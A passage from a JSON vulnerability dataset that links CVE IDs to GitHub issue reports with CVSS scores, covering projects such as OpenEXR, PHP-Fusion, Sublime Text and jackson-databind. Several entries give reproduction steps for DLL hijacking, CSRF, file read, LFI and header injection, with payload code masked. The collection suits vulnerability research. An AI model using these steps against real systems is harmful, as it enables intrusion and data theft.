  89984. "baseScore": 6.1,
  89985. "impactScore": 2.7,
  89986. "exploitabilityScore": 2.8
  89987. },
  89988. {
  89989. "CVE_ID": "CVE-2019-9114",
  89990. "Issue_Url_old": "https://github.com/libming/libming/issues/170",
  89991. "Issue_Url_new": "https://github.com/libming/libming/issues/170",
  89992. "Repo_new": "libming/libming",
  89993. "Issue_Created_At": "2019-01-02T06:25:41Z",
  89994. "description": "Out Of Bound Write in function APITAG . An Out Of Bound Write bug was found in function APITAG in decompile.c . Details with asan output is as below: ERRORTAG poc file URLTAG to reproduce it ,run swftocxx with oob_write_decompile NUMBERTAG APITAG credit: APITAG of Venustech",
  89995. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89996. "severity": "HIGH",
  89997. "baseScore": 8.8,
  89998. "impactScore": 5.9,
  89999. "exploitabilityScore": 2.8
  90000. },
  90001. {
  90002. "CVE_ID": "CVE-2019-9116",
  90003. "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/2544",
  90004. "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/2544",
  90005. "Repo_new": "sublimehq/sublime_text",
  90006. "Issue_Created_At": "2019-01-04T08:29:45Z",
  90007. "description": "DLL hijack in Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG win NUMBERTAG bit. Description Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG allows local users to gain privileges by creating a PATHTAG folder and then copying a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into this new folder, then creating FILETAG and opening it with FILETAG aka DLL Hijacking Steps to reproduce NUMBERTAG First step Create a new PATHTAG folder and then create a file named FILETAG in this folder NUMBERTAG Second step Copy a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into sublime_text folder NUMBERTAG Third step Open FILETAG by using FILETAG Expected behavior Load the FILETAG when open the FILETAG Actual behavior Load the FILETAG when open the FILETAG Environment Operating system and version: Windows NUMBERTAG APITAG NUMBERTAG Service Pack NUMBERTAG Sublime Text: Build NUMBERTAG bit",
  90008. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90009. "severity": "HIGH",
  90010. "baseScore": 7.8,
  90011. "impactScore": 5.9,
  90012. "exploitabilityScore": 1.8
  90013. },
  90014. {
  90015. "CVE_ID": "CVE-2020-12723",
  90016. "Issue_Url_old": "https://github.com/Perl/perl5/issues/16947",
  90017. "Issue_Url_new": "https://github.com/perl/perl5/issues/16947",
  90018. "Repo_new": "perl/perl5",
  90019. "Issue_Created_At": "2019-04-10T13:09:22Z",
  90020. "description": "Segfault in S_study_chunk APITAG Migrated from rt.perl.org NUMBERTAG URLTAG (status was 'open') Searchable as RT NUMBERTAG",
  90021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90022. "severity": "HIGH",
  90023. "baseScore": 7.5,
  90024. "impactScore": 3.6,
  90025. "exploitabilityScore": 3.9
  90026. },
  90027. {
  90028. "CVE_ID": "CVE-2020-12723",
  90029. "Issue_Url_old": "https://github.com/Perl/perl5/issues/17743",
  90030. "Issue_Url_new": "https://github.com/perl/perl5/issues/17743",
  90031. "Repo_new": "perl/perl5",
  90032. "Issue_Created_At": "2020-04-23T13:10:14Z",
  90033. "description": "study_chunk recursion. This is a placeholder ticket for consideration of a theoretically possible bug. In NUMBERTAG we found that study_chunk reinvokes itself in two ways by simple recursion, and by enframing. In some cases that involves restudying regexp ops multiple times, whereas in other cases the reinvocation is the only time the relevant ops are studied. The primary results of studying are a) to capture global information about the regexp that will be used for optimization at runtime; b) to make in place modifications to the ops for optimization (optional but desirable); and c) to make mandatory modifications to the ops, replacing temporary compile time only ops that the runtime engine does not know how to handle. Because of (c) it is required that every op is studied at least once. When ops are studied multiple times that can cause problems: the first invocation may capture information about the program, then reinvoke, then attempt to use the captured information assuming it has not changed. The conclusion is that mutation of ops must happen only once, at the outermost level of reinvocation that will act on the relevant ops. As far as I was able to discover the only case in which ops are studied multiple times is in the handling of GOSUB, which reinvokes by enframing. In NUMBERTAG this was resolved by recording in each frame whether it, or any outer frame, represented the handling of a GOSUB, and suppressing all mutating changes if so (confident that the same ops will be studied at some point in some outer frame that is not within the handling of a GOSUB). When we reinvoke by recursion, however, any frames used by the caller are not visible to the callee; as such it may still be possible to trigger the same types of problem if reinvocation involves a mix of enframing and recursion. Extending the fix from NUMBERTAG ad NUMBERTAG d3f to handle this case would involve adding an extra boolean argument APITAG to study_chunk. 
All principal calls would pass this in as NUMBERTAG all recursive calls would pass in the local value of APITAG ; and the setting of APITAG would change to: APITAG I don't intend to make such a change unless we find a testcase to show this is a real rather than a theoretical problem.",
  90034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90035. "severity": "HIGH",
  90036. "baseScore": 7.5,
  90037. "impactScore": 3.6,
  90038. "exploitabilityScore": 3.9
  90039. },
  90040. {
  90041. "CVE_ID": "CVE-2020-14156",
  90042. "Issue_Url_old": "https://github.com/openbmc/openbmc/issues/3670",
  90043. "Issue_Url_new": "https://github.com/openbmc/openbmc/issues/3670",
  90044. "Repo_new": "openbmc/openbmc",
  90045. "Issue_Created_At": "2020-06-15T14:49:16Z",
  90046. "description": "Reserved for bug report.",
  90047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90048. "severity": "HIGH",
  90049. "baseScore": 8.8,
  90050. "impactScore": 5.9,
  90051. "exploitabilityScore": 2.8
  90052. },
  90053. {
  90054. "CVE_ID": "CVE-2020-14160",
  90055. "Issue_Url_old": "https://github.com/gotenberg/gotenberg/issues/215",
  90056. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/215",
  90057. "Repo_new": "gotenberg/gotenberg",
  90058. "Issue_Created_At": "2020-06-15T18:02:03Z",
  90059. "description": "Vulnerabilities. Hi, I've identified NUMBERTAG high/critical severity vulnerabilities in Gotenberg that can potentially lead to RCE in the Docker container. These are different than the ones identified in URLTAG URLTAG . I've sent the details through email already on the provided PGP key in that existing issue. Thanks, APITAG",
  90060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  90061. "severity": "HIGH",
  90062. "baseScore": 7.5,
  90063. "impactScore": 3.6,
  90064. "exploitabilityScore": 3.9
  90065. },
  90066. {
  90067. "CVE_ID": "CVE-2020-15953",
  90068. "Issue_Url_old": "https://github.com/dinhvh/libetpan/issues/386",
  90069. "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/386",
  90070. "Repo_new": "dinhvh/libetpan",
  90071. "Issue_Created_At": "2020-06-18T12:09:50Z",
  90072. "description": "Buffering issues with STARTTLS in IMAP. We found a STARTTLS issue in APITAG which affects IMAP (and probably other protocols.) When the server responds with its \"let's do TLS now message\", e.g. APITAG , APITAG will read any data after the and save it into some internal buffer for later processing. This is problematic, because a MITM attacker can inject arbitrary responses. I haven't tested it to this extent, but I suspect that this is enough to forge entire mailboxes even though STARTTLS is used. There is a nice blog post by Wietse Venema about a \"command injection\" in postfix ( URLTAG What we have here is the problem in reverse, i.e. not a command injection, but a \"response injection.\" Example trace to give an intuition: CODETAG An attacker can probably inject more responses and (in the worst case) mimic a whole session. There are (from my view) three possible fixes NUMBERTAG discard any remaining data after stls NUMBERTAG shovel the extra data into the TLS layer (where it belongs), and NUMBERTAG error out as this is clearly a protocol violation. The (maybe silly or even wrong) commit in URLTAG seems to fix the issue (please ignore the .idea folder :P)",
  90073. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  90074. "severity": "HIGH",
  90075. "baseScore": 7.4,
  90076. "impactScore": 5.2,
  90077. "exploitabilityScore": 2.2
  90078. },
  90079. {
  90080. "CVE_ID": "CVE-2020-16587",
  90081. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/491",
  90082. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/491",
  90083. "Repo_new": "academysoftwarefoundation/openexr",
  90084. "Issue_Created_At": "2019-07-24T15:34:32Z",
  90085. "description": "SEGV exrheader in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrheader (the latest commit APITAG on master). APITAG URLTAG Command: exrheader APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG f bp NUMBERTAG ffc0b8eb5e0 sp NUMBERTAG ffc0b8eb5d0 READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG e in APITAG APITAG , APITAG > > const&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG fee0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG f in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG bb in APITAG const , int, bool) PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d8 in APITAG const ) PATHTAG NUMBERTAG eb in main PATHTAG NUMBERTAG f NUMBERTAG aea NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG afa NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG >::allocate(unsigned long, void const ) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG > APITAG >&, unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > >::_M_allocate(unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG PATHTAG ~~~ Thanks, Manh Dung",
  90086. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90087. "severity": "MEDIUM",
  90088. "baseScore": 5.5,
  90089. "impactScore": 3.6,
  90090. "exploitabilityScore": 1.8
  90091. },
  90092. {
  90093. "CVE_ID": "CVE-2020-16588",
  90094. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/493",
  90095. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/493",
  90096. "Repo_new": "academysoftwarefoundation/openexr",
  90097. "Issue_Created_At": "2019-07-24T15:47:58Z",
  90098. "description": "SEGV exrmakepreview in APITAG Hi, I found a null pointer dereference bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG db3 bp NUMBERTAG fbf NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffe NUMBERTAG fc NUMBERTAG T NUMBERTAG db2 in APITAG PATHTAG NUMBERTAG db2 in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fbf NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  90099. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90100. "severity": "MEDIUM",
  90101. "baseScore": 5.5,
  90102. "impactScore": 3.6,
  90103. "exploitabilityScore": 1.8
  90104. },
  90105. {
  90106. "CVE_ID": "CVE-2020-16589",
  90107. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/494",
  90108. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/494",
  90109. "Repo_new": "academysoftwarefoundation/openexr",
  90110. "Issue_Created_At": "2019-07-24T15:48:18Z",
  90111. "description": "SEGV exrmakepreview in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG c NUMBERTAG a bp NUMBERTAG ffe NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG c NUMBERTAG in APITAG int, int, int) ( PATHTAG NUMBERTAG f2f NUMBERTAG a8eac in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  90112. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90113. "severity": "MEDIUM",
  90114. "baseScore": 5.5,
  90115. "impactScore": 3.6,
  90116. "exploitabilityScore": 1.8
  90117. },
  90118. {
  90119. "CVE_ID": "CVE-2020-18878",
  90120. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/13",
  90121. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/13",
  90122. "Repo_new": "zorlan/skycaiji",
  90123. "Issue_Created_At": "2018-09-13T07:25:24Z",
  90124. "description": "Skycaiji cms has an arbitrary file read vulnerability at NUMBERTAG I found an arbitrary file read vulnerability at NUMBERTAG In the module of error log URL: FILETAG The parameter of file can control\uff0cfor example read FILETAG POC: APITAG suggest\uff1alimit the parameter of file Info NUMBERTAG I hope you can fix it Best wish! author by:xijun. EMAILTAG",
  90125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90126. "severity": "MEDIUM",
  90127. "baseScore": 5.3,
  90128. "impactScore": 1.4,
  90129. "exploitabilityScore": 3.9
  90130. },
  90131. {
  90132. "CVE_ID": "CVE-2020-19492",
  90133. "Issue_Url_old": "https://github.com/pts/sam2p/issues/66",
  90134. "Issue_Url_new": "https://github.com/pts/sam2p/issues/66",
  90135. "Repo_new": "pts/sam2p",
  90136. "Issue_Created_At": "2019-07-18T11:14:43Z",
  90137. "description": "Floating point exception. Hi, I found a FPE bug on the latest commit APITAG of master. APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says: ~~~ This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG sam2p asan: Warning: TGA NUMBERTAG bit image NUMBERTAG bit alpha is greater than NUMBERTAG total bits per pixel sam2p asan: Warning: TGA: reducing to bit alpha NUMBERTAG Floating point exception ~~~ Thanks, Manh Dung",
  90138. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90139. "severity": "HIGH",
  90140. "baseScore": 7.8,
  90141. "impactScore": 5.9,
  90142. "exploitabilityScore": 1.8
  90143. },
  90144. {
  90145. "CVE_ID": "CVE-2020-22783",
  90146. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3421",
  90147. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3421",
  90148. "Repo_new": "ether/etherpad-lite",
  90149. "Issue_Created_At": "2018-07-10T11:27:48Z",
  90150. "description": "plain text password in the database. I can see my admin password in plain text in the database. CODETAG That must not happen NUMBERTAG",
  90151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90152. "severity": "MEDIUM",
  90153. "baseScore": 6.5,
  90154. "impactScore": 3.6,
  90155. "exploitabilityScore": 2.8
  90156. },
  90157. {
  90158. "CVE_ID": "CVE-2020-23349",
  90159. "Issue_Url_old": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
  90160. "Issue_Url_new": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
  90161. "Repo_new": "sinaweibosdk/weibo_android_sdk",
  90162. "Issue_Created_At": "2018-11-08T01:23:12Z",
  90163. "description": "\u65b0\u6d6a\u5fae\u535a\u8d77\u8c03\u79c1\u6709\u7ec4\u4ef6. APITAG sso NUMBERTAG",
  90164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90165. "severity": "HIGH",
  90166. "baseScore": 7.5,
  90167. "impactScore": 3.6,
  90168. "exploitabilityScore": 3.9
  90169. },
  90170. {
  90171. "CVE_ID": "CVE-2020-25635",
  90172. "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/222",
  90173. "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/222",
  90174. "Repo_new": "ansible-collections/community.aws",
  90175. "Issue_Created_At": "2020-09-04T15:25:10Z",
  90176. "description": "aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers. SUMMARY The aws_ssm connection plugin uses an s3 bucket to transfer files to instances. These files remain in the bucket after the play has completed; they are never removed. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the transferred files are still there EXPECTED RESULTS The plugin should garbage collect files after transferring them. ACTUAL RESULTS Files written remain there forever.",
  90177. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90178. "severity": "MEDIUM",
  90179. "baseScore": 5.5,
  90180. "impactScore": 3.6,
  90181. "exploitabilityScore": 1.8
  90182. },
  90183. {
  90184. "CVE_ID": "CVE-2020-28723",
  90185. "Issue_Url_old": "https://github.com/CloudAvid/PParam/issues/9",
  90186. "Issue_Url_new": "https://github.com/cloudavid/pparam/issues/9",
  90187. "Repo_new": "cloudavid/pparam",
  90188. "Issue_Created_At": "2019-04-11T09:57:05Z",
  90189. "description": "Memory Leak in libpparam. Hi MENTIONTAG , I fuzz libparam and found two memory leak, source fuzz : URLTAG crash : URLTAG Thanks, Ramin",
  90190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90191. "severity": "HIGH",
  90192. "baseScore": 7.5,
  90193. "impactScore": 3.6,
  90194. "exploitabilityScore": 3.9
  90195. },
  90196. {
  90197. "CVE_ID": "CVE-2020-28724",
  90198. "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/822",
  90199. "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/822",
  90200. "Repo_new": "pallets/werkzeug",
  90201. "Issue_Created_At": "2015-12-06T11:54:40Z",
  90202. "description": "dev server sets wrong HTTP_HOST when path starts with a double slash. See URLTAG if APITAG environ['HTTP_HOST'] = APITAG This code was added in NUMBERTAG d NUMBERTAG Do absolute http requests even make sense except for HTTP proxies?",
  90203. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90204. "severity": "MEDIUM",
  90205. "baseScore": 6.1,
  90206. "impactScore": 2.7,
  90207. "exploitabilityScore": 2.8
  90208. },
  90209. {
  90210. "CVE_ID": "CVE-2020-29668",
  90211. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1041",
  90212. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1041",
  90213. "Repo_new": "sympa-community/sympa",
  90214. "Issue_Created_At": "2020-11-24T10:54:27Z",
  90215. "description": "Unauthorised full access via SOAP API due to illegal cookie. Version NUMBERTAG el7 on Centos NUMBERTAG Installation method Centos package Expected behavior permission denied Actual behavior error message and action actually executed anyway. Additional information In our setup we have a problem with incorrect cookies via the SOAP API of sympa. If the SOAP request contains a correct cookie everything works as expected > request executed If the SOAP request contains a correct but outdated cookie, everything works as expected > request correctly denied. If the SOAP request contains an arbitrary string as cookie (e.g. \"asdkjasdljkahsdlkjh\"), SOAP replies with an error APITAG session ID in cookie\") but STILL executes every request we make. This way we can add email addresses to lists without authentication; any operation we tried was still successful. We could hotfix the problem by inserting a APITAG command into PATHTAG like this: ERRORTAG",
  90216. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90217. "severity": "LOW",
  90218. "baseScore": 3.7,
  90219. "impactScore": 1.4,
  90220. "exploitabilityScore": 2.2
  90221. },
  90222. {
  90223. "CVE_ID": "CVE-2020-35669",
  90224. "Issue_Url_old": "https://github.com/dart-lang/http/issues/511",
  90225. "Issue_Url_new": "https://github.com/dart-lang/http/issues/511",
  90226. "Repo_new": "dart-lang/http",
  90227. "Issue_Created_At": "2020-12-23T11:07:32Z",
  90228. "description": "Header injection and path forgery security issue. I believe there is a security issue with the current implementation of Request . The full example can be found here: URLTAG What's wrong: Request is passing method verb as is to the stream without any kind of validation. basically: CODETAG generates request like: CODETAG What I'd expect If HTTP verb(method) is not a part of the known set of verbs ( PATHTAG ) I'd expect an exception to be thrown Why this is a security risk If the developer is using Request to abstract generating HTTP calls and he's accepting a method param from the user, the user can do some magic like header injection or path forgery. This can be exploited in many ways and seems to be quite important especially when a reverse proxy is in place. A proxy may just pass someone's request to any host. By running snippet URLTAG behind a proxy, I was nicely redirected (like this URLTAG to APITAG which was injected as per the example above. Let's assume I'm replacing APITAG with APITAG and the victim is working in a company behind the proxy. This means I can redirect calls with headers/cookies(tokens) and blah blah blah.",
  90229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90230. "severity": "MEDIUM",
  90231. "baseScore": 6.1,
  90232. "impactScore": 2.7,
  90233. "exploitabilityScore": 2.8
  90234. },
  90235. {
  90236. "CVE_ID": "CVE-2020-35687",
  90237. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2347",
  90238. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2347",
  90239. "Repo_new": "phpfusion/phpfusion",
  90240. "Issue_Created_At": "2020-12-21T16:21:03Z",
  90241. "description": "CSRF attack leads to deletion of shoutbox messages. Describe the bug PHP Fusion version NUMBERTAG is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. Version PHP Fusion version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using Demo credentials NUMBERTAG Create any random shoutbox message after logging into the application NUMBERTAG Now create an HTML form which performs the expected operation of deleting the shoutbox message. The one like below. CODETAG NUMBERTAG Save the above code as html NUMBERTAG Now, re login into the application NUMBERTAG Open the above html file in the same browser in which we are logged in NUMBERTAG Click on submit request and observe the shoutbox message gets deleted NUMBERTAG The attacker can change shout_id to a different value and observe that all the shoutbox messages of the logged in user can be deleted. Expected behavior NUMBERTAG Implement an anti CSRF token which is random and changes/destroys after it is used once NUMBERTAG Include this anti CSRF token in the POST body whenever the user deletes/performs any state changing requests. Screenshots FILETAG",
  90242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  90243. "severity": "MEDIUM",
  90244. "baseScore": 4.3,
  90245. "impactScore": 1.4,
  90246. "exploitabilityScore": 2.8
  90247. },
  90248. {
  90249. "CVE_ID": "CVE-2020-35728",
  90250. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2999",
  90251. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2999",
  90252. "Repo_new": "fasterxml/jackson-databind",
  90253. "Issue_Created_At": "2020-12-23T04:30:19Z",
  90254. "description": "Block NUMBERTAG more gadget types (placeholder) . (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): bu5yer (of Sangfor APITAG Security Lab) Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90255. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90256. "severity": "HIGH",
  90257. "baseScore": 8.1,
  90258. "impactScore": 5.9,
  90259. "exploitabilityScore": 2.2
  90260. },
  90261. {
  90262. "CVE_ID": "CVE-2020-35952",
  90263. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2346",
  90264. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2346",
  90265. "Repo_new": "phpfusion/phpfusion",
  90266. "Issue_Created_At": "2020-12-21T15:40:10Z",
  90267. "description": "User Enumeration in Sign in page. Describe the bug It was observed that the login page of the php fusion threw different messages upon different username entries. This shows that the product is vulnerable to user enumeration vulnerability. Version PHP Fusion latest version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using valid credentials NUMBERTAG Add a new user NUMBERTAG Now open a separate private tab, access the URL: FILETAG NUMBERTAG Try logging in with username that we created with wrong password, Observe the product throws message APITAG valid Password NUMBERTAG Now, try logging in with wrong/non existing username and password. Observe the application throws different message NUMBERTAG This difference in error message leads an attacker to collect valid usernames which can ease brute forcing or logging in attempt. Expected behavior Display a common message for any combination of wrong username/password. Screenshots FILETAG FILETAG",
  90268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90269. "severity": "MEDIUM",
  90270. "baseScore": 6.5,
  90271. "impactScore": 3.6,
  90272. "exploitabilityScore": 2.8
  90273. },
  90274. {
  90275. "CVE_ID": "CVE-2020-36052",
  90276. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/38",
  90277. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/38",
  90278. "Repo_new": "bg5sbk/minicms",
  90279. "Issue_Created_At": "2020-12-23T05:54:12Z",
  90280. "description": "an LFI loophole in FILETAG . In addition to FILETAG , there is also an LFI loophole in FILETAG FILETAG line NUMBERTAG index_file = PATHTAG require $index_file; line NUMBERTAG data = array( 'file' => $page_file, 'path' => $page_path, 'state' => $page_state, 'title' => $page_title, 'date' => $page_date, 'time' => $page_time, 'can_comment' => $page_can_comment, ); $index_file = PATHTAG require $index_file; $mc_pages FILETAG",
  90281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90282. "severity": "CRITICAL",
  90283. "baseScore": 9.8,
  90284. "impactScore": 5.9,
  90285. "exploitabilityScore": 3.9
  90286. },
  90287. {
  90288. "CVE_ID": "CVE-2020-36184",
  90289. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2998",
  90290. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2998",
  90291. "Repo_new": "fasterxml/jackson-databind",
  90292. "Issue_Created_At": "2020-12-23T04:18:43Z",
  90293. "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90294. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90295. "severity": "HIGH",
  90296. "baseScore": 8.1,
  90297. "impactScore": 5.9,
  90298. "exploitabilityScore": 2.2
  90299. },
  90300. {
  90301. "CVE_ID": "CVE-2020-36186",
  90302. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2997",
  90303. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2997",
  90304. "Repo_new": "fasterxml/jackson-databind",
  90305. "Issue_Created_At": "2020-12-23T04:18:08Z",
  90306. "description": "Block NUMBERTAG more gadget types (placeholder NUMBERTAG note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90307. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90308. "severity": "HIGH",
  90309. "baseScore": 8.1,
  90310. "impactScore": 5.9,
  90311. "exploitabilityScore": 2.2
  90312. },
  90313. {
  90314. "CVE_ID": "CVE-2020-36188",
  90315. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2996",
  90316. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2996",
  90317. "Repo_new": "fasterxml/jackson-databind",
  90318. "Issue_Created_At": "2020-12-23T04:09:48Z",
